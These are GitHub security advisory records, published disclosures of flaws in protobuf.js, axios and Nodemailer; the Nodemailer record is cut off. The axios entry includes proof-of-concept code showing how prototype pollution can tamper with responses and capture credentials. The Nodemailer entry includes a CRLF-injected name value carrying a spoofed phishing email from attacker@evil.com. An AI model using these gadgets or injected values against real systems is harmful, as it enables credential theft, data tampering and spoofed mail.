"id": "GHSA-jvwf-75h9-cwgg",
"modified": "2026-05-14T20:35:12Z",
"published": "2026-05-12T15:01:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jvwf-75h9-cwgg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44290"
},
{
"type": "PACKAGE",
"url": "https://github.com/protobufjs/protobuf.js"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v7.5.6"
},
{
"type": "WEB",
"url": "https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-v8.0.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "protobuf.js: Process-wide denial of service through unsafe option paths"
}
GHSA-PF86-5X62-JRWF
Vulnerability from github – Published: 2026-05-05 00:26 – Updated: 2026-05-05 00:26Summary
When Object.prototype has been polluted by any co-dependency with keys that axios reads without a hasOwnProperty guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process -- lodash < 4.17.21, or any of several other common npm packages with known PP vectors. The two gadgets confirmed here work independently.
Background: how mergeConfig builds the config object
Every axios request goes through Axios._request in lib/core/Axios.js#L76:
config = mergeConfig(this.defaults, config);
Inside mergeConfig, the merged config is built as a plain {} object (lib/core/mergeConfig.js#L20):
const config = {};
A plain {} inherits from Object.prototype. mergeConfig only iterates Object.keys({ ...config1, ...config2 }) (line 99), which is a spread of own properties. Any key that is absent from both this.defaults and the per-request config will never be set as an own property on the merged config. Reading that key later on the merged config falls through to Object.prototype. That is the root mechanism behind all gadgets below.
Gadget 1: parseReviver -- response tampering and exfiltration
Introduced in: v1.12.0 (commit 2a97634, PR #5926) Affected range: >= 1.12.0, <= 1.13.6
Root cause
The default transformResponse function calls JSON.parse(data, this.parseReviver):
return JSON.parse(data, this.parseReviver);
this is the merged config. parseReviver is not present in defaults and is not in the mergeMap inside mergeConfig. It is never set as an own property on the merged config. Accessing this.parseReviver therefore walks the prototype chain.
The call fires by default on every string response body because lib/defaults/transitional.js#L5 sets:
forcedJSONParsing: true,
which activates the JSON parse path unconditionally when responseType is unset.
JSON.parse(text, reviver) calls the reviver for every key-value pair in the parsed result, bottom-up. The reviver's return value is what the caller receives. An attacker-controlled reviver can both observe every key-value pair and silently replace values.
There is no interaction with assertOptions here. The assertOptions call in Axios._request (line 119) iterates Object.keys(config), and since parseReviver was never set as an own property, it is not in that list. Nothing validates or invokes the polluted function before transformResponse does.
Verification: own-property check
import { createRequire } from 'module';
const require = createRequire(import.meta.url);
const mergeConfig = require('./lib/core/mergeConfig.js').default;
const defaults = require('./lib/defaults/index.js').default;
const merged = mergeConfig(defaults, { url: '/test', method: 'get' });
console.log(Object.prototype.hasOwnProperty.call(merged, 'parseReviver')); // false
console.log(merged.parseReviver); // undefined (no pollution)
Object.prototype.parseReviver = function(k, v) { return v; };
console.log(merged.parseReviver); // [Function (anonymous)] -- inherited
delete Object.prototype.parseReviver;
Proof of concept
Two terminals. The server simulates a legitimate API endpoint. The client simulates a Node.js application whose process has been affected by prototype pollution from a co-dependency.
Terminal 1 -- server (server_gadget1.mjs):
import http from 'http';
const server = http.createServer((req, res) => {
console.log('[server] request:', req.method, req.url);
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ role: 'user', balance: 100, token: 'tok_real_abc' }));
});
server.listen(19003, '127.0.0.1', () => {
console.log('[server] listening on 127.0.0.1:19003');
});
$ node server_gadget1.mjs
[server] listening on 127.0.0.1:19003
[server] request: GET /
Terminal 2 -- client (poc_parsereviver.mjs):
import axios from 'axios';
// Simulate pollution arriving from a co-dependency (e.g. lodash < 4.17.21 via _.merge).
// In a real application this would be set before any axios request runs.
Object.prototype.parseReviver = function (key, value) {
// Called for every key-value pair in every JSON response parsed by axios in this process.
if (key !== '') {
// Exfiltrate: in a real attack this would POST to an attacker-controlled endpoint.
console.log('[exfil]', key, '=', JSON.stringify(value));
}
// Tamper: escalate role, inflate balance.
if (key === 'role') return 'admin';
if (key === 'balance') return 999999;
return value;
};
const res = await axios.get('http://127.0.0.1:19003/');
console.log('[app] received:', JSON.stringify(res.data));
delete Object.prototype.parseReviver;
$ node poc_parsereviver.mjs
[exfil] role = "user"
[exfil] balance = 100
[exfil] token = "tok_real_abc"
[app] received: {"role":"admin","balance":999999,"token":"tok_real_abc"}
The server sent role: user. The application received role: admin. The response is silently modified in place; no error is thrown, no log entry is produced.
Gadget 2: transport -- full HTTP request hijacking with credentials
Introduced in: early adapter refactor, present across 0.x and 1.x Affected range: >= 0.19.0, <= 1.13.6 (Node.js http adapter only)
Root cause
Inside the Node.js http adapter at lib/adapters/http.js#L676:
if (config.transport) {
transport = config.transport;
}
transport is listed in mergeMap inside mergeConfig (line 88):
transport: defaultToConfig2,
but it is not present in lib/defaults/index.js at all. mergeConfig iterates Object.keys({ ...config1, ...config2 }) (line 99). Since config1 (the defaults) has no transport key and a typical per-request config has none either, the key never enters the loop. It is never set as an own property on the merged config. The read at line 676 falls through to Object.prototype.
The fix in v1.13.5 (PR #7369) added a hasOwnProp check for mergeMap access, but the iteration set itself is the issue -- transport simply never enters it. The fix does not address this.
The transport interface is { request(options, handleResponseCallback) }. The options object passed to transport.request at adapter runtime contains:
options.hostname,options.port,options.path-- full target URLoptions.auth-- basic auth credentials in"username:password"form (set at line 606)options.headers-- all request headers as a plain object
Proof of concept
Two terminals. The server is a legitimate API endpoint that processes the request normally. The client's process has been affected by prototype pollution.
Terminal 1 -- server (server_gadget2.mjs):
import http from 'http';
const server = http.createServer((req, res) => {
console.log('[server] request:', req.method, req.url, 'auth:', req.headers.authorization || '(none)');
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end('{"ok":true}');
});
server.listen(19002, '127.0.0.1', () => {
console.log('[server] listening on 127.0.0.1:19002');
});
$ node server_gadget2.mjs
[server] listening on 127.0.0.1:19002
[server] request: GET /api/users auth: Basic c3ZjX2FjY291bnQ6aHVudGVyMg==
Terminal 2 -- client (poc_transport.mjs):
import axios from 'axios';
import http from 'http';
Object.prototype.transport = {
request(options, handleResponse) {
// Intercept: called for every outbound request in this process.
console.log('[hijack] target:', options.hostname + ':' + options.port + options.path);
console.log('[hijack] auth:', options.auth);
console.log('[hijack] headers:', JSON.stringify(options.headers));
// Forward to the real transport so the caller sees a normal 200.
return http.request(options, handleResponse);
},
};
const res = await axios.get('http://127.0.0.1:19002/api/users', {
auth: { username: 'svc_account', password: 'hunter2' },
});
console.log('[app] response status:', res.status);
delete Object.prototype.transport;
$ node poc_transport.mjs
[hijack] target: 127.0.0.1:19002/api/users
[hijack] auth: svc_account:hunter2
[hijack] headers: {"Accept":"application/json, text/plain, */*","User-Agent":"axios/1.13.6","Accept-Encoding":"gzip, compress, deflate, br"}
[app] response status: 200
The basic auth credentials are fully visible to the attacker's transport function. The request completes normally from the caller's perspective.
Additional gadget: transformRequest / transformResponse
Separately, mergeConfig reads config2[prop] at line 102 without a hasOwnProperty guard. For keys like transformRequest and transformResponse that are present in defaults (and therefore processed by the mergeMap loop), if Object.prototype.transformRequest is polluted before the request, config2["transformRequest"] inherits the polluted value and defaultToConfig2 replaces the safe default transforms with the attacker's function.
This one requires a discriminator because assertOptions in Axios._request (line 119) reads schema[opt] for every key in the merged config's own keys, and schema["transformRequest"] also inherits from Object.prototype, causing it to call the polluted value as a validator. The gadget function needs to return true when its first argument is a function (the assertOptions call) and perform the attack when its first argument is data (the transformData call).
Both transformRequest (fires with request body) and transformResponse (fires with response body) are confirmed affected. Range: >= 0.19.0, <= 1.13.6.
Why the existing fix does not cover these
PR #7369 / CVE-2026-25639 (fixed in v1.13.5) addressed a separate class: passing {"__proto__": {"x": 1}} as the config object, which caused mergeMap['__proto__'] to resolve to Object.prototype (a non-function), crashing axios. The fix added an explicit block on __proto__, constructor, and prototype as config keys, and changed mergeMap[prop] to utils.hasOwnProp(mergeMap, prop) ? mergeMap[prop] : ....
That fix only addresses config keys that are explicitly set to __proto__ (or similar) by the caller. It does not add hasOwnProperty guards on the value reads (config2[prop] at line 102, this.parseReviver, config.transport). An application using a PP-vulnerable co-dependency and making axios requests is still fully exposed after upgrading to 1.13.5 or 1.13.6.
Suggested fixes
For parseReviver (lib/defaults/index.js#L124):
const reviver = Object.prototype.hasOwnProperty.call(this, 'parseReviver') ? this.parseReviver : undefined;
return JSON.parse(data, reviver);
For mergeConfig value reads (lib/core/mergeConfig.js#L102):
const configValue = merge(
config1[prop],
utils.hasOwnProp(config2, prop) ? config2[prop] : undefined,
prop
);
For transport and other adapter reads from config (lib/adapters/http.js#L676):
if (utils.hasOwnProp(config, 'transport') && config.transport) {
transport = config.transport;
}
The same hasOwnProp pattern applies to lookup, httpVersion, http2Options, family, and formSerializer reads in the adapter.
Environment
- axios: 1.13.6
- Node.js: 22.22.0
- OS: macOS 14
- Reproduction: confirmed in isolated test harness, both gadgets independently verified
Disclosure
Reported via GitHub Security Advisories at https://github.com/axios/axios/security/advisories/new per the axios security policy.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "1.15.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.31.0"
},
"package": {
"ecosystem": "npm",
"name": "axios"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.31.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-42033"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-05T00:26:29Z",
"nvd_published_at": "2026-04-24T18:16:29Z",
"severity": "HIGH"
},
"details": "## Summary\n\nWhen `Object.prototype` has been polluted by any co-dependency with keys that axios reads without a `hasOwnProperty` guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process -- lodash \u003c 4.17.21, or any of several other common npm packages with known PP vectors. The two gadgets confirmed here work independently.\n\n---\n\n## Background: how mergeConfig builds the config object\n\nEvery axios request goes through `Axios._request` in [`lib/core/Axios.js#L76`](https://github.com/axios/axios/blob/v1.13.6/lib/core/Axios.js#L76):\n\n```js\nconfig = mergeConfig(this.defaults, config);\n```\n\nInside `mergeConfig`, the merged config is built as a plain `{}` object ([`lib/core/mergeConfig.js#L20`](https://github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L20)):\n\n```js\nconst config = {};\n```\n\nA plain `{}` inherits from `Object.prototype`. `mergeConfig` only iterates `Object.keys({ ...config1, ...config2 })` ([line 99](https://github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L99)), which is a spread of own properties. Any key that is absent from both `this.defaults` and the per-request config will never be set as an own property on the merged config. Reading that key later on the merged config falls through to `Object.prototype`. That is the root mechanism behind all gadgets below.\n\n---\n\n## Gadget 1: parseReviver -- response tampering and exfiltration\n\n**Introduced in:** v1.12.0 (commit 2a97634, PR #5926)\n**Affected range:** \u003e= 1.12.0, \u003c= 1.13.6\n\n### Root cause\n\nThe default `transformResponse` function calls [`JSON.parse(data, this.parseReviver)`](https://github.com/axios/axios/blob/v1.13.6/lib/defaults/index.js#L124):\n\n```js\nreturn JSON.parse(data, this.parseReviver);\n```\n\n`this` is the merged config. `parseReviver` is not present in `defaults` and is not in the `mergeMap` inside `mergeConfig`. It is never set as an own property on the merged config. Accessing `this.parseReviver` therefore walks the prototype chain.\n\nThe call fires by default on every string response body because [`lib/defaults/transitional.js#L5`](https://github.com/axios/axios/blob/v1.13.6/lib/defaults/transitional.js#L5) sets:\n\n```js\nforcedJSONParsing: true,\n```\n\nwhich activates the JSON parse path unconditionally when `responseType` is unset.\n\n`JSON.parse(text, reviver)` calls the reviver for every key-value pair in the parsed result, bottom-up. The reviver\u0027s return value is what the caller receives. An attacker-controlled reviver can both observe every key-value pair and silently replace values.\n\nThere is no interaction with `assertOptions` here. The `assertOptions` call in `Axios._request` ([line 119](https://github.com/axios/axios/blob/v1.13.6/lib/core/Axios.js#L119)) iterates `Object.keys(config)`, and since `parseReviver` was never set as an own property, it is not in that list. Nothing validates or invokes the polluted function before `transformResponse` does.\n\n### Verification: own-property check\n\n```js\nimport { createRequire } from \u0027module\u0027;\nconst require = createRequire(import.meta.url);\nconst mergeConfig = require(\u0027./lib/core/mergeConfig.js\u0027).default;\nconst defaults = require(\u0027./lib/defaults/index.js\u0027).default;\n\nconst merged = mergeConfig(defaults, { url: \u0027/test\u0027, method: \u0027get\u0027 });\nconsole.log(Object.prototype.hasOwnProperty.call(merged, \u0027parseReviver\u0027)); // false\nconsole.log(merged.parseReviver); // undefined (no pollution)\n\nObject.prototype.parseReviver = function(k, v) { return v; };\nconsole.log(merged.parseReviver); // [Function (anonymous)] -- inherited\ndelete Object.prototype.parseReviver;\n```\n\n### Proof of concept\n\nTwo terminals. The server simulates a legitimate API endpoint. The client simulates a Node.js application whose process has been affected by prototype pollution from a co-dependency.\n\n**Terminal 1 -- server (`server_gadget1.mjs`):**\n\n```js\nimport http from \u0027http\u0027;\n\nconst server = http.createServer((req, res) =\u003e {\n console.log(\u0027[server] request:\u0027, req.method, req.url);\n res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 });\n res.end(JSON.stringify({ role: \u0027user\u0027, balance: 100, token: \u0027tok_real_abc\u0027 }));\n});\n\nserver.listen(19003, \u0027127.0.0.1\u0027, () =\u003e {\n console.log(\u0027[server] listening on 127.0.0.1:19003\u0027);\n});\n```\n\n```\n$ node server_gadget1.mjs\n[server] listening on 127.0.0.1:19003\n[server] request: GET /\n```\n\n**Terminal 2 -- client (`poc_parsereviver.mjs`):**\n\n```js\nimport axios from \u0027axios\u0027;\n\n// Simulate pollution arriving from a co-dependency (e.g. lodash \u003c 4.17.21 via _.merge).\n// In a real application this would be set before any axios request runs.\nObject.prototype.parseReviver = function (key, value) {\n // Called for every key-value pair in every JSON response parsed by axios in this process.\n if (key !== \u0027\u0027) {\n // Exfiltrate: in a real attack this would POST to an attacker-controlled endpoint.\n console.log(\u0027[exfil]\u0027, key, \u0027=\u0027, JSON.stringify(value));\n }\n // Tamper: escalate role, inflate balance.\n if (key === \u0027role\u0027) return \u0027admin\u0027;\n if (key === \u0027balance\u0027) return 999999;\n return value;\n};\n\nconst res = await axios.get(\u0027http://127.0.0.1:19003/\u0027);\nconsole.log(\u0027[app] received:\u0027, JSON.stringify(res.data));\n\ndelete Object.prototype.parseReviver;\n```\n\n```\n$ node poc_parsereviver.mjs\n[exfil] role = \"user\"\n[exfil] balance = 100\n[exfil] token = \"tok_real_abc\"\n[app] received: {\"role\":\"admin\",\"balance\":999999,\"token\":\"tok_real_abc\"}\n```\n\nThe server sent `role: user`. The application received `role: admin`. The response is silently modified in place; no error is thrown, no log entry is produced.\n\n---\n\n## Gadget 2: transport -- full HTTP request hijacking with credentials\n\n**Introduced in:** early adapter refactor, present across 0.x and 1.x\n**Affected range:** \u003e= 0.19.0, \u003c= 1.13.6 (Node.js http adapter only)\n\n### Root cause\n\nInside the Node.js http adapter at [`lib/adapters/http.js#L676`](https://github.com/axios/axios/blob/v1.13.6/lib/adapters/http.js#L676):\n\n```js\nif (config.transport) {\n transport = config.transport;\n}\n```\n\n`transport` is listed in `mergeMap` inside `mergeConfig` ([line 88](https://github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L88)):\n\n```js\ntransport: defaultToConfig2,\n```\n\nbut it is not present in [`lib/defaults/index.js`](https://github.com/axios/axios/blob/v1.13.6/lib/defaults/index.js) at all. `mergeConfig` iterates `Object.keys({ ...config1, ...config2 })` ([line 99](https://github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L99)). Since `config1` (the defaults) has no `transport` key and a typical per-request config has none either, the key never enters the loop. It is never set as an own property on the merged config. The read at line 676 falls through to `Object.prototype`.\n\nThe fix in v1.13.5 (PR #7369) added a `hasOwnProp` check for `mergeMap` access, but the iteration set itself is the issue -- `transport` simply never enters it. The fix does not address this.\n\nThe transport interface is `{ request(options, handleResponseCallback) }`. The options object passed to `transport.request` at adapter runtime contains:\n\n- `options.hostname`, `options.port`, `options.path` -- full target URL\n- `options.auth` -- basic auth credentials in `\"username:password\"` form (set at [line 606](https://github.com/axios/axios/blob/v1.13.6/lib/adapters/http.js#L606))\n- `options.headers` -- all request headers as a plain object\n\n### Proof of concept\n\nTwo terminals. The server is a legitimate API endpoint that processes the request normally. The client\u0027s process has been affected by prototype pollution.\n\n**Terminal 1 -- server (`server_gadget2.mjs`):**\n\n```js\nimport http from \u0027http\u0027;\n\nconst server = http.createServer((req, res) =\u003e {\n console.log(\u0027[server] request:\u0027, req.method, req.url, \u0027auth:\u0027, req.headers.authorization || \u0027(none)\u0027);\n res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 });\n res.end(\u0027{\"ok\":true}\u0027);\n});\n\nserver.listen(19002, \u0027127.0.0.1\u0027, () =\u003e {\n console.log(\u0027[server] listening on 127.0.0.1:19002\u0027);\n});\n```\n\n```\n$ node server_gadget2.mjs\n[server] listening on 127.0.0.1:19002\n[server] request: GET /api/users auth: Basic c3ZjX2FjY291bnQ6aHVudGVyMg==\n```\n\n**Terminal 2 -- client (`poc_transport.mjs`):**\n\n```js\nimport axios from \u0027axios\u0027;\nimport http from \u0027http\u0027;\n\nObject.prototype.transport = {\n request(options, handleResponse) {\n // Intercept: called for every outbound request in this process.\n console.log(\u0027[hijack] target:\u0027, options.hostname + \u0027:\u0027 + options.port + options.path);\n console.log(\u0027[hijack] auth:\u0027, options.auth);\n console.log(\u0027[hijack] headers:\u0027, JSON.stringify(options.headers));\n // Forward to the real transport so the caller sees a normal 200.\n return http.request(options, handleResponse);\n },\n};\n\nconst res = await axios.get(\u0027http://127.0.0.1:19002/api/users\u0027, {\n auth: { username: \u0027svc_account\u0027, password: \u0027hunter2\u0027 },\n});\nconsole.log(\u0027[app] response status:\u0027, res.status);\n\ndelete Object.prototype.transport;\n```\n\n```\n$ node poc_transport.mjs\n[hijack] target: 127.0.0.1:19002/api/users\n[hijack] auth: svc_account:hunter2\n[hijack] headers: {\"Accept\":\"application/json, text/plain, */*\",\"User-Agent\":\"axios/1.13.6\",\"Accept-Encoding\":\"gzip, compress, deflate, br\"}\n[app] response status: 200\n```\n\nThe basic auth credentials are fully visible to the attacker\u0027s transport function. The request completes normally from the caller\u0027s perspective.\n\n---\n\n## Additional gadget: transformRequest / transformResponse\n\nSeparately, `mergeConfig` reads `config2[prop]` at [line 102](https://github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L102) without a `hasOwnProperty` guard. For keys like `transformRequest` and `transformResponse` that are present in `defaults` (and therefore processed by the mergeMap loop), if `Object.prototype.transformRequest` is polluted before the request, `config2[\"transformRequest\"]` inherits the polluted value and `defaultToConfig2` replaces the safe default transforms with the attacker\u0027s function.\n\nThis one requires a discriminator because `assertOptions` in `Axios._request` ([line 119](https://github.com/axios/axios/blob/v1.13.6/lib/core/Axios.js#L119)) reads `schema[opt]` for every key in the merged config\u0027s own keys, and `schema[\"transformRequest\"]` also inherits from `Object.prototype`, causing it to call the polluted value as a validator. The gadget function needs to return `true` when its first argument is a function (the assertOptions call) and perform the attack when its first argument is data (the [`transformData`](https://github.com/axios/axios/blob/v1.13.6/lib/core/transformData.js#L22) call).\n\nBoth `transformRequest` (fires with request body) and `transformResponse` (fires with response body) are confirmed affected. Range: \u003e= 0.19.0, \u003c= 1.13.6.\n\n---\n\n## Why the existing fix does not cover these\n\nPR #7369 / CVE-2026-25639 (fixed in v1.13.5) addressed a separate class: passing `{\"__proto__\": {\"x\": 1}}` as the config object, which caused `mergeMap[\u0027__proto__\u0027]` to resolve to `Object.prototype` (a non-function), crashing axios. The fix added an explicit block on `__proto__`, `constructor`, and `prototype` as config keys, and changed `mergeMap[prop]` to `utils.hasOwnProp(mergeMap, prop) ? mergeMap[prop] : ...`.\n\nThat fix only addresses config keys that are explicitly set to `__proto__` (or similar) by the caller. It does not add `hasOwnProperty` guards on the value reads (`config2[prop]` at [line 102](https://github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L102), `this.parseReviver`, `config.transport`). An application using a PP-vulnerable co-dependency and making axios requests is still fully exposed after upgrading to 1.13.5 or 1.13.6.\n\n---\n\n## Suggested fixes\n\nFor `parseReviver` ([`lib/defaults/index.js#L124`](https://github.com/axios/axios/blob/v1.13.6/lib/defaults/index.js#L124)):\n```js\nconst reviver = Object.prototype.hasOwnProperty.call(this, \u0027parseReviver\u0027) ? this.parseReviver : undefined;\nreturn JSON.parse(data, reviver);\n```\n\nFor `mergeConfig` value reads ([`lib/core/mergeConfig.js#L102`](https://github.com/axios/axios/blob/v1.13.6/lib/core/mergeConfig.js#L102)):\n```js\nconst configValue = merge(\n config1[prop],\n utils.hasOwnProp(config2, prop) ? config2[prop] : undefined,\n prop\n);\n```\n\nFor `transport` and other adapter reads from config ([`lib/adapters/http.js#L676`](https://github.com/axios/axios/blob/v1.13.6/lib/adapters/http.js#L676)):\n```js\nif (utils.hasOwnProp(config, \u0027transport\u0027) \u0026\u0026 config.transport) {\n transport = config.transport;\n}\n```\n\nThe same `hasOwnProp` pattern applies to `lookup`, `httpVersion`, `http2Options`, `family`, and `formSerializer` reads in the adapter.\n\n---\n\n## Environment\n\n- axios: 1.13.6\n- Node.js: 22.22.0\n- OS: macOS 14\n- Reproduction: confirmed in isolated test harness, both gadgets independently verified\n\n## Disclosure\n\nReported via GitHub Security Advisories at https://github.com/axios/axios/security/advisories/new per the axios security policy.",
"id": "GHSA-pf86-5x62-jrwf",
"modified": "2026-05-05T00:26:30Z",
"published": "2026-05-05T00:26:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
},
{
"type": "PACKAGE",
"url": "https://github.com/axios/axios"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Axios: Prototype Pollution Gadgets - Response Tampering, Data Exfiltration, and Request Hijacking"
}
GHSA-VVJJ-XCJG-GR5G
Vulnerability from github – Published: 2026-04-08 15:05 – Updated: 2026-04-08 15:05Summary
Nodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport name configuration option. The name value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (\r\n). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.
Details
The vulnerability exists in lib/smtp-connection/index.js. When establishing an SMTP connection, the name option is concatenated directly into the EHLO command:
// lib/smtp-connection/index.js, line 71
this.name = this.options.name || this._getHostname();
// line 1336
this._sendCommand('EHLO ' + this.name);
The _sendCommand method writes the string directly to the socket followed by \r\n (line 1082):
this._socket.write(Buffer.from(str + '\r\n', 'utf-8'));
If the name option contains \r\n sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the envelope.from and envelope.to fields which are validated for \r\n (line 1107-1119), and unlike envelope.size which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the name parameter receives no CRLF sanitization whatsoever.
This is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (name vs size), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.
The name option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.
PoC
const nodemailer = require('nodemailer');
const net = require('net');
// Simple SMTP server to observe injected commands
const server = net.createServer(socket => {
socket.write('220 test ESMTP\r\n');
socket.on('data', data => {
const lines = data.toString().split('\r\n').filter(l => l);
lines.forEach(line => {
console.log('SMTP CMD:', line);
if (line.startsWith('EHLO') || line.startsWith('HELO'))
socket.write('250 OK\r\n');
else if (line.startsWith('MAIL FROM'))
socket.write('250 OK\r\n');
else if (line.startsWith('RCPT TO'))
socket.write('250 OK\r\n');
else if (line === 'DATA')
socket.write('354 Go\r\n');
else if (line === '.')
socket.write('250 OK\r\n');
else if (line === 'QUIT')
{ socket.write('221 Bye\r\n'); socket.end(); }
else if (line === 'RSET')
socket.write('250 OK\r\n');
});
});
});
server.listen(0, '127.0.0.1', () => {
const port = server.address().port;
// Inject a complete phishing email via EHLO name
const transport = nodemailer.createTransport({
host: '127.0.0.1',
port: port,
secure: false,
name: 'legit.host\r\nMAIL FROM:<attacker@evil.com>\r\n'
+ 'RCPT TO:<victim@target.com>\r\nDATA\r\n'
+ 'From: ceo@company.com\r\nTo: victim@target.com\r\n'
+ 'Subject: Urgent\r\n\r\nPhishing content\r\n.\r\nRSET'
});
transport.sendMail({
from: 'legit@example.com',
to: 'legit-recipient@example.com',
subject: 'Normal email',
text: 'Normal content'
}, () => { server.close(); process.exit(0); });
});
Running this PoC shows the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate SMTP commands before the legitimate email is sent.
Impact
Who is affected: Applications that allow users or external input to configure the name SMTP transport option. This includes:
- Multi-tenant SaaS platforms with per-tenant SMTP configuration
- Admin panels where SMTP hostname/name settings are stored in databases
- Applications loading SMTP config from environment variables or external sources
What can an attacker do: 1. Send unauthorized emails to arbitrary recipients by injecting MAIL FROM and RCPT TO commands 2. Spoof email senders by injecting arbitrary From headers in the DATA portion 3. Conduct phishing attacks using the legitimate SMTP server as a relay 4. Bypass application-level controls on email recipients, since the injected commands are processed before the application's intended MAIL FROM/RCPT TO 5. Perform SMTP reconnaissance by injecting commands like VRFY or EXPN
The injection occurs at the EHLO stage (before authentication in most SMTP flows), making it particularly dangerous as the injected commands may be processed with the server's trust context.
Recommended fix: Sanitize the name option by stripping or rejecting CRLF sequences, similar to how envelope.from and envelope.to are already validated on lines 1107-1119 of lib/smtp-connection/index.js. For example:
this.name = (this.options.name || this._getHostname()).replace(/[\r\n]/g, '');
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 8.0.4"
},
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.0.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-08T15:05:20Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable to SMTP command injection via CRLF sequences in the transport `name` configuration option. The `name` value is used directly in the EHLO/HELO SMTP command without any sanitization for carriage return and line feed characters (`\\r\\n`). An attacker who can influence this option can inject arbitrary SMTP commands, enabling unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing an SMTP connection, the `name` option is concatenated directly into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand(\u0027EHLO \u0027 + this.name);\n```\n\nThe `_sendCommand` method writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str + \u0027\\r\\n\u0027, \u0027utf-8\u0027));\n```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line is interpreted by the SMTP server as a separate command. Unlike the `envelope.from` and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM command), and occurs at connection initialization rather than during message sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer = require(\u0027nodemailer\u0027);\nconst net = require(\u0027net\u0027);\n\n// Simple SMTP server to observe injected commands\nconst server = net.createServer(socket =\u003e {\n socket.write(\u0027220 test ESMTP\\r\\n\u0027);\n socket.on(\u0027data\u0027, data =\u003e {\n const lines = data.toString().split(\u0027\\r\\n\u0027).filter(l =\u003e l);\n lines.forEach(line =\u003e {\n console.log(\u0027SMTP CMD:\u0027, line);\n if (line.startsWith(\u0027EHLO\u0027) || line.startsWith(\u0027HELO\u0027))\n socket.write(\u0027250 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027MAIL FROM\u0027))\n socket.write(\u0027250 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027RCPT TO\u0027))\n socket.write(\u0027250 OK\\r\\n\u0027);\n else if (line === \u0027DATA\u0027)\n socket.write(\u0027354 Go\\r\\n\u0027);\n else if (line === \u0027.\u0027)\n socket.write(\u0027250 OK\\r\\n\u0027);\n else if (line === \u0027QUIT\u0027)\n { socket.write(\u0027221 Bye\\r\\n\u0027); socket.end(); }\n else if (line === \u0027RSET\u0027)\n socket.write(\u0027250 OK\\r\\n\u0027);\n });\n });\n});\n\nserver.listen(0, \u0027127.0.0.1\u0027, () =\u003e {\n const port = server.address().port;\n\n // Inject a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n host: 